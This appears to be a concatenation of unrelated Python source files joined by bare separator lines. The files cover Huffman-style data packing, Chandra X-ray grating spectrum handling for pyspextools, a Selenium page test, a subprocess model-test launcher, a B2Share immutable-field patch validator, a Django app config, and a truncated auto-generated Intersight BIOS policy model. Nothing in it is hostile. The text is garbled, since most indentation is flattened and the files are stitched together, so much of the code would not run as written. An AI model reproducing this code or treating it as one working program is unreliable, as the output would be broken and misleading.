    buf = buf + struct.pack((SIZEB + SIZE) * (oBytel // 2), *oByte)  # integer division: oByte holds (key, count) pairs
return buf
def unpackData(buf):
sizeb = struct.calcsize(SIZEB)
size = struct.calcsize(SIZE)
filled = struct.unpack(SIZEB, buf[:sizeb])[0]
buf = buf[sizeb:]
sBytel = struct.unpack(SIZE, buf[0:size])[0]
buf = buf[size:]
oBytel = struct.unpack(SIZE, buf[0:size])[0]
buf = buf[size:]
sByte = struct.unpack(SIZEB * sBytel, buf[:sizeb * sBytel])
buf = buf[sizeb * sBytel:]
    oByte = struct.unpack((SIZEB + SIZE) * (oBytel // 2),  # integer division: (key, count) pairs
                          buf[:oBytel * size * sizeb])
return {
'output': stripZeros(byteListToString(sByte), filled)["output"],
'occurrence': byteListToOccurrence(oByte)
}
def fillZeros(txt):
tofill = 8 - (len(txt) % 8)
return {
'filled': tofill,
'output': txt + "0" * tofill
}
def stripZeros(txt, tostrip):
return {
        'stripped': tostrip,
'output': txt[: - tostrip]
}
def readBinaryToEncode(ifile):
txt = list()
byte = ifile.read(1)
while byte:
txt.append(byte)
byte = ifile.read(1)
return txt
def readBinaryToDecode(ifile):
return ifile.read()
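# Round-trip sketch (hedged: the bit string and frequency table are arbitrary
# example values; keys must be single characters with ordinals below 256).
if __name__ == "__main__":
    bits = "1011001110100101"
    occurrence = {"a": 3, "b": 5}
    blob = packData(bits, occurrence)
    restored = unpackData(blob)
    assert restored["output"] == bits
    assert restored["occurrence"] == occurrence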
|
python
|
#!/usr/bin/env python
# Import stuff for compatibility between python 2 and 3
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import str
from future import standard_library
import os
import numpy as np
import pyspextools.messages as message
from .region import Region
from .res import Res
from .spo import Spo
from .pha2 import Pha2
from .pha import Pha
from .rmf import Rmf
from .arf import Arf
from .convert import rmf_to_res
from .convert import pha_to_spo
standard_library.install_aliases()
class TGRegion(Region):
"""The TGRegion class contains methods to read Chandra grating data into the pyspextools module and convert
these to spo and res format objects."""
def __init__(self):
Region.__init__(self)
self.grating = '' #: Grating name
# -----------------------------------------------------
# Read a set of Chandra grating files into a region
# -----------------------------------------------------
def read_region(self, pha2file, rmflist, arflist, grating, bkgsubtract=True):
"""Add a Chandra spectrum and response to a SPEX region. The pha2 file and the rmf and arf file lists
are mandatory. The grating option can be either HETG, METG or LETG"""
self.grating = grating
# Read the PHA2 file for a particular grating
(src, bkg) = self.__read_pha2(pha2file, grating, bkgsubtract=bkgsubtract)
if not isinstance(src,Pha):
message.error("Failed to read spectrum file.")
return 1
# Convert the PHA2 file to spo
rmf = Rmf()
rmf.read(rmflist[0])
self.spo = pha_to_spo(src, rmf, back=bkg)
if not isinstance(self.spo,Spo):
message.error("Failed to convert spectrum file.")
return 1
# Convert the responses to res
self.res = self.__rmflist_to_res(rmflist, arflist)
if not isinstance(self.res,Res):
message.error("Failed to combine and convert response files.")
return 1
self.label = grating
return 0
def __read_pha2(self, pha2file, grating, bkgsubtract=True):
# Initialize PHA2 file type
spec = Pha2()
# Is the source spectrum there?
message.proc_start("Read source spectrum")
if os.path.isfile(pha2file):
stat = spec.read(pha2file,background=bkgsubtract)
if stat != 0:
message.proc_end(stat)
message.error("Failed to read source spectrum.")
return 1
else:
message.proc_end(stat)
else:
message.proc_end(1)
message.error("Spectrum file {0} not found in path.".format(pha2file))
return 1
# Convert grating name to number
if grating == 'HETG':
ngrating = 1
elif grating == 'METG':
ngrating = 2
elif grating == 'LETG':
ngrating = 3
else:
message.error("Unsupported grating: '{0}'.".format(grating))
return 1
# Combine spectra from a single grating
message.proc_start("Combining orders of the spectrum")
(src, bkg) = spec.combine_orders(ngrating)
if isinstance(src, Pha) and isinstance(bkg, Pha):
message.proc_end(0)
else:
message.proc_end(1)
return 1
return src, bkg
# -----------------------------------------------------
# Return a res object derived from Chandra grating data
# -----------------------------------------------------
def __rmflist_to_res(self, rmflist, arflist):
"""Convert a list of compatible rmf and arf file into one res file. This is convenient for combining responses
that are provided separately, like the Transmission Grating spectra from Chandra."""
if len(rmflist) != len(arflist):
message.error("ARF list and RMF list do not have the same length.")
return 0
rmfobjs = np.zeros(len(rmflist), dtype=object)
arfobjs = np.zeros(len(arflist), dtype=object)
rmf_orders = np.zeros(len(rmflist), dtype=int)
arf_orders = np.zeros(len(arflist), dtype=int)
i = 0
for file in rmflist:
message.proc_start("Reading response for order")
rmf = Rmf()
rmf.read(file)
rmf_orders[i] = rmf.Order
print(str(rmf_orders[i])+" ", end='')
            if len(np.where(rmf_orders == rmf.Order)[0]) != 1:
message.error("There are two response files with the same order.")
message.proc_end(1)
return 1
else:
rmfobjs[i] = rmf
message.proc_end(0)
i = i + 1
        i = 0
for file in arflist:
message.proc_start("Reading effective area for order")
arf = Arf()
arf.read(file)
arf_orders[i] = arf.Order
print(str(arf_orders[i])+" ", end='')
            if len(np.where(arf_orders == arf.Order)[0]) != 1:
message.error("There are two effective area files for the same order.")
message.proc_end(1)
return 1
else:
arfobjs[i] = arf
message.proc_end(0)
i = i + 1
arfsort = np.argsort(arf_orders)
rmfsort = np.argsort(rmf_orders)
# Calculate first response:
res = rmf_to_res(rmfobjs[rmfsort[0]],arf=arfobjs[arfsort[0]])
# Append the components from the other responses
for i in np.arange(len(rmfsort)-1)+1:
restmp = rmf_to_res(rmfobjs[rmfsort[i]],arf=arfobjs[arfsort[i]])
res.append_component(restmp)
return res
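# Usage sketch (hedged: the file names below are placeholders for real Chandra
# grating products; orders are combined per grating).
#
#   region = TGRegion()
#   region.read_region("obs_pha2.fits",
#                      ["heg_m1.rmf", "heg_p1.rmf"],
#                      ["heg_m1.arf", "heg_p1.arf"],
#                      "HETG")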
|
python
|
from selenium import webdriver
from training_ground_page import TrainingGroundPage
from trial_page import TrialPage
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
# Test Setup
browser = webdriver.Chrome(options=options)
# Test
trial_page = TrialPage(browser)
trial_page.go()
trial_page.stone_input.input_text('rock')
trial_page.stone_button.click()
# Training grounds
instruction_page = TrainingGroundPage(driver = browser)
instruction_page.go()
assert instruction_page.button1.text == 'Button1', 'Unexpected button1 text'
browser.quit()
# Alternative flow using the TrainingGroundPage helper methods:
#   instruction_page.type_into_input(test_value)
#   instruction_page.click_button_1()
#   text_from_input = instruction_page.get_input_text()
#   assert text_from_input == test_value, f'Test Failed: Input did not match expected ({test_value}).'
#   print('Test passed!')
|
python
|
import re
import subprocess
def read_model_list():
with open('latest_model_list.txt') as f:
return f.readlines()
records = read_model_list()
for record in records:
    # Extract the numeric map id from a token like "test42"
    test_map = re.search(r'test([0-9]+)', record).group(1)
args = []
model_info = record.replace('\n','').split(' ')
model_path = model_info[0] + '/' + model_info[1]
args.append('python')
args.append('test_neural_walker.py')
args.append('-seed')
args.append(str(12345 + int(test_map)))
args.append('-model_path')
args.append(model_path)
args.append('-test_map')
args.append(test_map)
    args.append('-file_save')
    # Strip the trailing newline so it doesn't end up in the file name,
    # and use a proper .txt extension
    args.append(record.replace('\n', '') + '.txt')
subprocess.call(args)
|
python
|
# -*- coding: utf-8 -*-
#
# This file is part of EUDAT B2Share.
# Copyright (C) 2016 CERN.
#
# B2Share is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# B2Share is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with B2Share; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""B2Share deposit input loaders."""
from flask import abort, request
from invenio_rest.errors import RESTValidationError, FieldError
IMMUTABLE_PATHS = {
# fields added by the serializer
'/owners',
'/ePIC_PID',
'/DOI',
'/files',
# real fields
'/community',
'/$schema',
'/_pid',
'/_oai',
'/_files',
'/_deposit',
}
def check_patch_input_loader(record, immutable_paths):
data = request.get_json(force=True)
if data is None:
abort(400)
modified_fields = {cmd['path'] for cmd in data
if 'path' in cmd and 'op' in cmd and cmd['op'] != 'test'}
errors = [FieldError(field, 'The field "{}" is immutable.'.format(field))
for field in immutable_paths.intersection(modified_fields)]
if len(errors) > 0:
raise RESTValidationError(errors=errors)
return data
def deposit_patch_input_loader(record=None):
return check_patch_input_loader(record, IMMUTABLE_PATHS)
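# Illustration: a JSON Patch body like
#   [{"op": "replace", "path": "/community", "value": "..."}]
# is rejected with a RESTValidationError because '/community' is immutable,
# while "test" operations on the same path pass, since they are excluded from
# the modified-fields check above.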
|
python
|
"""Apps module for the orp_api app."""
# Third Party
from django.apps import AppConfig
class OrpApiConfig(AppConfig):
"""Configuration for application."""
default_auto_field = 'django.db.models.BigAutoField'
name = 'orp_apps.orp_api'
|
python
|
# coding: utf-8
"""
Intersight REST API
This is Intersight REST API
OpenAPI spec version: 1.0.9-255
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class BiosPolicy(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'account_moid': 'str',
'ancestors': 'list[MoBaseMoRef]',
'create_time': 'datetime',
'mod_time': 'datetime',
'moid': 'str',
'object_type': 'str',
'owners': 'list[str]',
'parent': 'MoBaseMoRef',
'tags': 'list[MoTag]',
'version_context': 'MoVersionContext',
'description': 'str',
'name': 'str',
'adjacent_cache_line_prefetch': 'str',
'all_usb_devices': 'str',
'altitude': 'str',
'aspm_support': 'str',
'assert_nmi_on_perr': 'str',
'assert_nmi_on_serr': 'str',
'auto_cc_state': 'str',
'autonumous_cstate_enable': 'str',
'baud_rate': 'str',
'bme_dma_mitigation': 'str',
'boot_option_num_retry': 'str',
'boot_option_re_cool_down': 'str',
'boot_option_retry': 'str',
'boot_performance_mode': 'str',
'cbs_cmn_cpu_cpb': 'str',
'cbs_cmn_cpu_gen_downcore_ctrl': 'str',
'cbs_cmn_cpu_global_cstate_ctrl': 'str',
'cbs_cmn_cpu_l1stream_hw_prefetcher': 'str',
'cbs_cmn_cpu_l2stream_hw_prefetcher': 'str',
'cbs_cmn_determinism_slider': 'str',
'cbs_cmn_gnb_nb_iommu': 'str',
'cbs_cmn_mem_ctrl_bank_group_swap_ddr4': 'str',
'cbs_cmn_mem_map_bank_interleave_ddr4': 'str',
'cbs_cmnc_tdp_ctl': 'str',
'cbs_df_cmn_mem_intlv': 'str',
'cbs_df_cmn_mem_intlv_size': 'str',
'cdn_enable': 'str',
'cdn_support': 'str',
'channel_inter_leave': 'str',
'cke_low_policy': 'str',
'closed_loop_therm_throtl': 'str',
'cmci_enable': 'str',
'config_tdp': 'str',
'console_redirection': 'str',
'core_multi_processing': 'str',
'cpu_energy_performance': 'str',
'cpu_frequency_floor': 'str',
'cpu_performance': 'str',
'cpu_power_management': 'str',
'demand_scrub': 'str',
'direct_cache_access': 'str',
'dram_clock_throttling': 'str',
'dram_refresh_rate': 'str',
'energy_efficient_turbo': 'str',
'eng_perf_tuning': 'str',
'enhanced_intel_speed_step_tech': 'str',
'epp_profile': 'str',
'execute_disable_bit': 'str',
'extended_apic': 'str',
'flow_control': 'str',
'frb2enable': 'str',
'hardware_prefetch': 'str',
'hwpm_enable': 'str',
'imc_interleave': 'str',
'intel_hyper_threading_tech': 'str',
'intel_turbo_boost_tech': 'str',
'intel_virtualization_technology': 'str',
'intel_vt_for_directed_io': 'str',
'intel_vtd_coherency_support': 'str',
'intel_vtd_interrupt_remapping': 'str',
'intel_vtd_pass_through_dma_support': 'str',
'intel_vtdats_support': 'str',
'ioh_error_enable': 'str',
'ioh_resource': 'str',
'ip_prefetch': 'str',
'ipv6pxe': 'str',
'kti_prefetch': 'str',
'legacy_os_redirection': 'str',
'legacy_usb_support': 'str',
'llc_prefetch': 'str',
'lom_port0state': 'str',
'lom_port1state': 'str',
'lom_port2state': 'str',
'lom_port3state': 'str',
'lom_ports_all_state': 'str',
'lv_ddr_mode': 'str',
'make_device_non_bootable': 'str',
'memory_inter_leave': 'str',
'memory_mapped_io_above4gb': 'str',
'mirroring_mode': 'str',
'mmcfg_base': 'str',
'numa_optimized': 'str',
'onboard10gbit_lom': 'str',
'onboard_gbit_lom': 'str',
'onboard_scu_storage_support': 'str',
'onboard_scu_storage_sw_stack': 'str',
'organization': 'IamAccountRef',
'os_boot_watchdog_timer': 'str',
'os_boot_watchdog_timer_policy': 'str',
'os_boot_watchdog_timer_timeout': 'str',
'out_of_band_mgmt_port': 'str',
'package_cstate_limit': 'str',
'patrol_scrub': 'str',
'patrol_scrub_duration': 'str',
'pc_ie_ssd_hot_plug_support': 'str',
'pch_usb30mode': 'str',
'pci_option_ro_ms': 'str',
'pci_rom_clp': 'str',
'pop_support': 'str',
'post_error_pause': 'str',
'processor_c1e': 'str',
'processor_c3report': 'str',
'processor_c6report': 'str',
'processor_cstate': 'str',
'profiles': 'list[PolicyAbstractConfigProfileRef]',
'psata': 'str',
'pstate_coord_type': 'str',
'putty_key_pad': 'str',
'pwr_perf_tuning': 'str',
'qpi_link_frequency': 'str',
'qpi_snoop_mode': 'str',
'rank_inter_leave': 'str',
'redirection_after_post': 'str',
'sata_mode_select': 'str',
'select_memory_ras_configuration': 'str',
'serial_port_aenable': 'str',
'single_pctl_enable': 'str',
'slot10link_speed': 'str',
'slot10state': 'str',
'slot11link_speed': 'str',
'slot11state': 'str',
'slot12link_speed': 'str',
'slot12state': 'str',
'slot1link_speed': 'str',
'slot1state': 'str',
'slot2link_speed': 'str',
'slot2state': 'str',
'slot3link_speed': 'str',
'slot3state': 'str',
'slot4link_speed': 'str',
'slot4state': 'str',
'slot5link_speed': 'str',
'slot5state': 'str',
'slot6link_speed': 'str',
'slot6state': 'str',
'slot7link_speed': 'str',
'slot7state': 'str',
'slot8link_speed': 'str',
'slot8state': 'str',
'slot9link_speed': 'str',
'slot9state': 'str',
'slot_flom_link_speed': 'str',
'slot_front_nvme1link_speed': 'str',
'slot_front_nvme2link_speed': 'str',
'slot_front_slot5link_speed': 'str',
'slot_front_slot6link_speed': 'str',
'slot_hba_link_speed': 'str',
'slot_hba_state': 'str',
'slot_lom1link': 'str',
'slot_lom2link': 'str',
'slot_mezz_state': 'str',
'slot_mlom_link_speed': 'str',
'slot_mlom_state': 'str',
'slot_mraid_link_speed': 'str',
'slot_mraid_state': 'str',
'slot_n10state': 'str',
'slot_n11state': 'str',
'slot_n12state': 'str',
'slot_n13state': 'str',
'slot_n14state': 'str',
'slot_n15state': 'str',
'slot_n16state': 'str',
'slot_n17state': 'str',
'slot_n18state': 'str',
'slot_n19state': 'str',
'slot_n1state': 'str',
'slot_n20state': 'str',
'slot_n21state': 'str',
'slot_n22state': 'str',
'slot_n23state': 'str',
'slot_n24state': 'str',
'slot_n2state': 'str',
'slot_n3state': 'str',
'slot_n4state': 'str',
'slot_n5state': 'str',
'slot_n6state': 'str',
'slot_n7state': 'str',
'slot_n8state': 'str',
'slot_n9state': 'str',
'slot_raid_link_speed': 'str',
'slot_raid_state': 'str',
'slot_rear_nvme1link_speed': 'str',
'slot_rear_nvme1state': 'str',
'slot_rear_nvme2link_speed': 'str',
'slot_rear_nvme2state': 'str',
'slot_rear_nvme3state': 'str',
'slot_rear_nvme4state': 'str',
'slot_rear_nvme5state': 'str',
'slot_rear_nvme6state': 'str',
'slot_rear_nvme7state': 'str',
'slot_rear_nvme8state': 'str',
'slot_riser1link_speed': 'str',
'slot_riser1slot1link_speed': 'str',
'slot_riser1slot2link_speed': 'str',
'slot_riser1slot3link_speed': 'str',
'slot_riser2link_speed': 'str',
'slot_riser2slot4link_speed': 'str',
'slot_riser2slot5link_speed': 'str',
'slot_riser2slot6link_speed': 'str',
'slot_sas_state': 'str',
'slot_ssd_slot1link_speed': 'str',
'slot_ssd_slot2link_speed': 'str',
'smee': 'str',
'smt_mode': 'str',
'snc': 'str',
'sparing_mode': 'str',
'sr_iov': 'str',
'streamer_prefetch': 'str',
'svm_mode': 'str',
'terminal_type': 'str',
'tpm_control': 'str',
'tpm_support': 'str',
'txt_support': 'str',
'ucsm_boot_order_rule': 'str',
'usb_emul6064': 'str',
'usb_port_front': 'str',
'usb_port_internal': 'str',
'usb_port_kvm': 'str',
'usb_port_rear': 'str',
'usb_port_sd_card': 'str',
'usb_port_vmedia': 'str',
'usb_xhci_support': 'str',
'vga_priority': 'str',
'vmd_enable': 'str',
'work_load_config': 'str',
'xpt_prefetch': 'str'
}
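# The swagger_types map above records the declared type of every attribute;
# attribute_map below pairs each snake_case Python name with the CamelCase
# key used in the Intersight JSON payloads. The generated ApiClient consults
# both maps when serializing and deserializing this model.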
attribute_map = {
'account_moid': 'AccountMoid',
'ancestors': 'Ancestors',
'create_time': 'CreateTime',
'mod_time': 'ModTime',
'moid': 'Moid',
'object_type': 'ObjectType',
'owners': 'Owners',
'parent': 'Parent',
'tags': 'Tags',
'version_context': 'VersionContext',
'description': 'Description',
'name': 'Name',
'adjacent_cache_line_prefetch': 'AdjacentCacheLinePrefetch',
'all_usb_devices': 'AllUsbDevices',
'altitude': 'Altitude',
'aspm_support': 'AspmSupport',
'assert_nmi_on_perr': 'AssertNmiOnPerr',
'assert_nmi_on_serr': 'AssertNmiOnSerr',
'auto_cc_state': 'AutoCcState',
'autonumous_cstate_enable': 'AutonumousCstateEnable',
'baud_rate': 'BaudRate',
'bme_dma_mitigation': 'BmeDmaMitigation',
'boot_option_num_retry': 'BootOptionNumRetry',
'boot_option_re_cool_down': 'BootOptionReCoolDown',
'boot_option_retry': 'BootOptionRetry',
'boot_performance_mode': 'BootPerformanceMode',
'cbs_cmn_cpu_cpb': 'CbsCmnCpuCpb',
'cbs_cmn_cpu_gen_downcore_ctrl': 'CbsCmnCpuGenDowncoreCtrl',
'cbs_cmn_cpu_global_cstate_ctrl': 'CbsCmnCpuGlobalCstateCtrl',
'cbs_cmn_cpu_l1stream_hw_prefetcher': 'CbsCmnCpuL1streamHwPrefetcher',
'cbs_cmn_cpu_l2stream_hw_prefetcher': 'CbsCmnCpuL2streamHwPrefetcher',
'cbs_cmn_determinism_slider': 'CbsCmnDeterminismSlider',
'cbs_cmn_gnb_nb_iommu': 'CbsCmnGnbNbIommu',
'cbs_cmn_mem_ctrl_bank_group_swap_ddr4': 'CbsCmnMemCtrlBankGroupSwapDdr4',
'cbs_cmn_mem_map_bank_interleave_ddr4': 'CbsCmnMemMapBankInterleaveDdr4',
'cbs_cmnc_tdp_ctl': 'CbsCmncTdpCtl',
'cbs_df_cmn_mem_intlv': 'CbsDfCmnMemIntlv',
'cbs_df_cmn_mem_intlv_size': 'CbsDfCmnMemIntlvSize',
'cdn_enable': 'CdnEnable',
'cdn_support': 'CdnSupport',
'channel_inter_leave': 'ChannelInterLeave',
'cke_low_policy': 'CkeLowPolicy',
'closed_loop_therm_throtl': 'ClosedLoopThermThrotl',
'cmci_enable': 'CmciEnable',
'config_tdp': 'ConfigTdp',
'console_redirection': 'ConsoleRedirection',
'core_multi_processing': 'CoreMultiProcessing',
'cpu_energy_performance': 'CpuEnergyPerformance',
'cpu_frequency_floor': 'CpuFrequencyFloor',
'cpu_performance': 'CpuPerformance',
'cpu_power_management': 'CpuPowerManagement',
'demand_scrub': 'DemandScrub',
'direct_cache_access': 'DirectCacheAccess',
'dram_clock_throttling': 'DramClockThrottling',
'dram_refresh_rate': 'DramRefreshRate',
'energy_efficient_turbo': 'EnergyEfficientTurbo',
'eng_perf_tuning': 'EngPerfTuning',
'enhanced_intel_speed_step_tech': 'EnhancedIntelSpeedStepTech',
'epp_profile': 'EppProfile',
'execute_disable_bit': 'ExecuteDisableBit',
'extended_apic': 'ExtendedApic',
'flow_control': 'FlowControl',
'frb2enable': 'Frb2enable',
'hardware_prefetch': 'HardwarePrefetch',
'hwpm_enable': 'HwpmEnable',
'imc_interleave': 'ImcInterleave',
'intel_hyper_threading_tech': 'IntelHyperThreadingTech',
'intel_turbo_boost_tech': 'IntelTurboBoostTech',
'intel_virtualization_technology': 'IntelVirtualizationTechnology',
'intel_vt_for_directed_io': 'IntelVtForDirectedIo',
'intel_vtd_coherency_support': 'IntelVtdCoherencySupport',
'intel_vtd_interrupt_remapping': 'IntelVtdInterruptRemapping',
'intel_vtd_pass_through_dma_support': 'IntelVtdPassThroughDmaSupport',
'intel_vtdats_support': 'IntelVtdatsSupport',
'ioh_error_enable': 'IohErrorEnable',
'ioh_resource': 'IohResource',
'ip_prefetch': 'IpPrefetch',
'ipv6pxe': 'Ipv6pxe',
'kti_prefetch': 'KtiPrefetch',
'legacy_os_redirection': 'LegacyOsRedirection',
'legacy_usb_support': 'LegacyUsbSupport',
'llc_prefetch': 'LlcPrefetch',
'lom_port0state': 'LomPort0state',
'lom_port1state': 'LomPort1state',
'lom_port2state': 'LomPort2state',
'lom_port3state': 'LomPort3state',
'lom_ports_all_state': 'LomPortsAllState',
'lv_ddr_mode': 'LvDdrMode',
'make_device_non_bootable': 'MakeDeviceNonBootable',
'memory_inter_leave': 'MemoryInterLeave',
'memory_mapped_io_above4gb': 'MemoryMappedIoAbove4gb',
'mirroring_mode': 'MirroringMode',
'mmcfg_base': 'MmcfgBase',
'numa_optimized': 'NumaOptimized',
'onboard10gbit_lom': 'Onboard10gbitLom',
'onboard_gbit_lom': 'OnboardGbitLom',
'onboard_scu_storage_support': 'OnboardScuStorageSupport',
'onboard_scu_storage_sw_stack': 'OnboardScuStorageSwStack',
'organization': 'Organization',
'os_boot_watchdog_timer': 'OsBootWatchdogTimer',
'os_boot_watchdog_timer_policy': 'OsBootWatchdogTimerPolicy',
'os_boot_watchdog_timer_timeout': 'OsBootWatchdogTimerTimeout',
'out_of_band_mgmt_port': 'OutOfBandMgmtPort',
'package_cstate_limit': 'PackageCstateLimit',
'patrol_scrub': 'PatrolScrub',
'patrol_scrub_duration': 'PatrolScrubDuration',
'pc_ie_ssd_hot_plug_support': 'PcIeSsdHotPlugSupport',
'pch_usb30mode': 'PchUsb30mode',
'pci_option_ro_ms': 'PciOptionRoMs',
'pci_rom_clp': 'PciRomClp',
'pop_support': 'PopSupport',
'post_error_pause': 'PostErrorPause',
'processor_c1e': 'ProcessorC1e',
'processor_c3report': 'ProcessorC3report',
'processor_c6report': 'ProcessorC6report',
'processor_cstate': 'ProcessorCstate',
'profiles': 'Profiles',
'psata': 'Psata',
'pstate_coord_type': 'PstateCoordType',
'putty_key_pad': 'PuttyKeyPad',
'pwr_perf_tuning': 'PwrPerfTuning',
'qpi_link_frequency': 'QpiLinkFrequency',
'qpi_snoop_mode': 'QpiSnoopMode',
'rank_inter_leave': 'RankInterLeave',
'redirection_after_post': 'RedirectionAfterPost',
'sata_mode_select': 'SataModeSelect',
'select_memory_ras_configuration': 'SelectMemoryRasConfiguration',
'serial_port_aenable': 'SerialPortAenable',
'single_pctl_enable': 'SinglePctlEnable',
'slot10link_speed': 'Slot10linkSpeed',
'slot10state': 'Slot10state',
'slot11link_speed': 'Slot11linkSpeed',
'slot11state': 'Slot11state',
'slot12link_speed': 'Slot12linkSpeed',
'slot12state': 'Slot12state',
'slot1link_speed': 'Slot1linkSpeed',
'slot1state': 'Slot1state',
'slot2link_speed': 'Slot2linkSpeed',
'slot2state': 'Slot2state',
'slot3link_speed': 'Slot3linkSpeed',
'slot3state': 'Slot3state',
'slot4link_speed': 'Slot4linkSpeed',
'slot4state': 'Slot4state',
'slot5link_speed': 'Slot5linkSpeed',
'slot5state': 'Slot5state',
'slot6link_speed': 'Slot6linkSpeed',
'slot6state': 'Slot6state',
'slot7link_speed': 'Slot7linkSpeed',
'slot7state': 'Slot7state',
'slot8link_speed': 'Slot8linkSpeed',
'slot8state': 'Slot8state',
'slot9link_speed': 'Slot9linkSpeed',
'slot9state': 'Slot9state',
'slot_flom_link_speed': 'SlotFlomLinkSpeed',
'slot_front_nvme1link_speed': 'SlotFrontNvme1linkSpeed',
'slot_front_nvme2link_speed': 'SlotFrontNvme2linkSpeed',
'slot_front_slot5link_speed': 'SlotFrontSlot5linkSpeed',
'slot_front_slot6link_speed': 'SlotFrontSlot6linkSpeed',
'slot_hba_link_speed': 'SlotHbaLinkSpeed',
'slot_hba_state': 'SlotHbaState',
'slot_lom1link': 'SlotLom1link',
'slot_lom2link': 'SlotLom2link',
'slot_mezz_state': 'SlotMezzState',
'slot_mlom_link_speed': 'SlotMlomLinkSpeed',
'slot_mlom_state': 'SlotMlomState',
'slot_mraid_link_speed': 'SlotMraidLinkSpeed',
'slot_mraid_state': 'SlotMraidState',
'slot_n10state': 'SlotN10state',
'slot_n11state': 'SlotN11state',
'slot_n12state': 'SlotN12state',
'slot_n13state': 'SlotN13state',
'slot_n14state': 'SlotN14state',
'slot_n15state': 'SlotN15state',
'slot_n16state': 'SlotN16state',
'slot_n17state': 'SlotN17state',
'slot_n18state': 'SlotN18state',
'slot_n19state': 'SlotN19state',
'slot_n1state': 'SlotN1state',
'slot_n20state': 'SlotN20state',
'slot_n21state': 'SlotN21state',
'slot_n22state': 'SlotN22state',
'slot_n23state': 'SlotN23state',
'slot_n24state': 'SlotN24state',
'slot_n2state': 'SlotN2state',
'slot_n3state': 'SlotN3state',
'slot_n4state': 'SlotN4state',
'slot_n5state': 'SlotN5state',
'slot_n6state': 'SlotN6state',
'slot_n7state': 'SlotN7state',
'slot_n8state': 'SlotN8state',
'slot_n9state': 'SlotN9state',
'slot_raid_link_speed': 'SlotRaidLinkSpeed',
'slot_raid_state': 'SlotRaidState',
'slot_rear_nvme1link_speed': 'SlotRearNvme1linkSpeed',
'slot_rear_nvme1state': 'SlotRearNvme1state',
'slot_rear_nvme2link_speed': 'SlotRearNvme2linkSpeed',
'slot_rear_nvme2state': 'SlotRearNvme2state',
'slot_rear_nvme3state': 'SlotRearNvme3state',
'slot_rear_nvme4state': 'SlotRearNvme4state',
'slot_rear_nvme5state': 'SlotRearNvme5state',
'slot_rear_nvme6state': 'SlotRearNvme6state',
'slot_rear_nvme7state': 'SlotRearNvme7state',
'slot_rear_nvme8state': 'SlotRearNvme8state',
'slot_riser1link_speed': 'SlotRiser1linkSpeed',
'slot_riser1slot1link_speed': 'SlotRiser1slot1linkSpeed',
'slot_riser1slot2link_speed': 'SlotRiser1slot2linkSpeed',
'slot_riser1slot3link_speed': 'SlotRiser1slot3linkSpeed',
'slot_riser2link_speed': 'SlotRiser2linkSpeed',
'slot_riser2slot4link_speed': 'SlotRiser2slot4linkSpeed',
'slot_riser2slot5link_speed': 'SlotRiser2slot5linkSpeed',
'slot_riser2slot6link_speed': 'SlotRiser2slot6linkSpeed',
'slot_sas_state': 'SlotSasState',
'slot_ssd_slot1link_speed': 'SlotSsdSlot1linkSpeed',
'slot_ssd_slot2link_speed': 'SlotSsdSlot2linkSpeed',
'smee': 'Smee',
'smt_mode': 'SmtMode',
'snc': 'Snc',
'sparing_mode': 'SparingMode',
'sr_iov': 'SrIov',
'streamer_prefetch': 'StreamerPrefetch',
'svm_mode': 'SvmMode',
'terminal_type': 'TerminalType',
'tpm_control': 'TpmControl',
'tpm_support': 'TpmSupport',
'txt_support': 'TxtSupport',
'ucsm_boot_order_rule': 'UcsmBootOrderRule',
'usb_emul6064': 'UsbEmul6064',
'usb_port_front': 'UsbPortFront',
'usb_port_internal': 'UsbPortInternal',
'usb_port_kvm': 'UsbPortKvm',
'usb_port_rear': 'UsbPortRear',
'usb_port_sd_card': 'UsbPortSdCard',
'usb_port_vmedia': 'UsbPortVmedia',
'usb_xhci_support': 'UsbXhciSupport',
'vga_priority': 'VgaPriority',
'vmd_enable': 'VmdEnable',
'work_load_config': 'WorkLoadConfig',
'xpt_prefetch': 'XptPrefetch'
}
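# Constructor note: every BIOS token parameter defaults to the string
# 'platform-default', which defers the setting to the server platform's own
# default. Only the managed-object base fields and the reference-typed
# arguments (organization, profiles) default to None.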
def __init__(self, account_moid=None, ancestors=None, create_time=None, mod_time=None, moid=None, object_type=None, owners=None, parent=None, tags=None, version_context=None, description=None, name=None, adjacent_cache_line_prefetch='platform-default', all_usb_devices='platform-default', altitude='platform-default', aspm_support='platform-default', assert_nmi_on_perr='platform-default', assert_nmi_on_serr='platform-default', auto_cc_state='platform-default', autonumous_cstate_enable='platform-default', baud_rate='platform-default', bme_dma_mitigation='platform-default', boot_option_num_retry='platform-default', boot_option_re_cool_down='platform-default', boot_option_retry='platform-default', boot_performance_mode='platform-default', cbs_cmn_cpu_cpb='platform-default', cbs_cmn_cpu_gen_downcore_ctrl='platform-default', cbs_cmn_cpu_global_cstate_ctrl='platform-default', cbs_cmn_cpu_l1stream_hw_prefetcher='platform-default', cbs_cmn_cpu_l2stream_hw_prefetcher='platform-default', cbs_cmn_determinism_slider='platform-default', cbs_cmn_gnb_nb_iommu='platform-default', cbs_cmn_mem_ctrl_bank_group_swap_ddr4='platform-default', cbs_cmn_mem_map_bank_interleave_ddr4='platform-default', cbs_cmnc_tdp_ctl='platform-default', cbs_df_cmn_mem_intlv='platform-default', cbs_df_cmn_mem_intlv_size='platform-default', cdn_enable='platform-default', cdn_support='platform-default', channel_inter_leave='platform-default', cke_low_policy='platform-default', closed_loop_therm_throtl='platform-default', cmci_enable='platform-default', config_tdp='platform-default', console_redirection='platform-default', core_multi_processing='platform-default', cpu_energy_performance='platform-default', cpu_frequency_floor='platform-default', cpu_performance='platform-default', 